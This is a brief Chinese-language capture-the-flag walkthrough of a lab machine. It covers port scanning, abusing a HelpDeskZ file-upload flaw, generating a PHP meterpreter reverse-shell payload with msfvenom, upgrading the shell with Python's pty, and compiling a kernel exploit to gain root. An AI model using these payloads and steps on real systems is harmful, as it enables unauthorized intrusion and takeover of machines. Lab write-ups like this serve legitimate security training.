Nmap开路,显示三个端口,22、80、3000 访问80端口显示为默认Apach2界面   顺着思路使用Dirb以及Nikto猜解Web目录,时间漫长;猜解同时访问3000端口,获得信息Shiv,以及要求提供凭证才能访问。[过程中该信息完全没用,可能两条路?构造Http?SQL?还是单纯的干扰] 尝试突破3000的同时Nikto完成扫描,发现可疑目录support 访问发现名为HelpDeskZ的Web App,其工单系统可以上传文件。在exploit-db中发现虽然该app有过滤但是依然可以上传.php文件[https://www.exploit-db.com/exploits/40300] 但该脚本需要知道上传文件的位置,暴力盲猜无果,Github内查看到该web app的源码,一番查看发现upload文件的位置为/upload/ticket 生成phppayload

1
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

上传,执行,get user。

借用Python使shell更好使

1
python -c 'import pty; pty.spawn("/bin/sh")'

该lab root比较简单

查看内核版本为4.4.0-116

查找是否有提权脚本

本地编译

1
gcc -Wall -o exploit code.c -Wl,--hash-style=both

上传,改权限,执行,Get Root.